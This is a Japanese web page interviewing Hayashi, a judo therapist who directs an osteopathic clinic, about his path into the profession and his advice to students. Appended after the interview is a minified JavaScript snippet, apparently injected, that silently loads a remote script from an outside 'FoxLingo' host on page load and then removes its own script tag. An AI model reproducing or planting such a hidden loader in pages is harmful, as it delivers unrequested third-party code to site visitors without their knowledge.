柔道整復師 林 さん

自分の頑張りが最大限いかせる仕事。

柔道整復師 林 さん
さくら整骨院 院長
平成21年3月 京都医健 柔道整復科I部(午後集中コース)卒業
大阪ハイテクノロジー専門学校 出身

Qaq 柔道整復師を目指したきっかけ

Qaa 小3から高校を卒業するまで体操競技をしていました。スポーツに関わる仕事がしたいと思い専門学校でトレーナーの勉強をしました。その中でももっと身体に関わりたいという思いが強くなり柔道整復師を目指すことにしました。

Qaq 分院長になるまで

Qaa 今の職場に入ったのか京都医健に入学した3年前。すごく良い職場にめぐり合えました。色々な仕事を任せていただいています。その中で、3院目を開院するので院長をやってみないかと言っていただきました。自分自身も免許を取って自分でやりたいという気持ちが強くなったときだったのでとても嬉しかったです。

Qaq 今後の目標と夢

Qaa まずはここで自分がどれだけできるかを試したいです。患者様・スタッフ・地域から必要とされ、自分に出会って良かったと言っていただける柔道整復師になりたいと思っています。

Qaq これから柔道整復師を目指す方へのメッセージ

Qaa 多くの資格がある中で、私はこの資格とめぐり合えて良かったですし、自分の頑張りが最大限生かせる仕事だと思います。勉強は大変ですが自分が将来何をしたいのか、どうなりたいのかを考えながら、勉強してください。先生が教えてくれる事すべてに意味があります。学生時代はこの勉強がどのように役に立つのかと思うこともあるかと思いますが、現場に出た今は、とても役に立っていると感じています。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();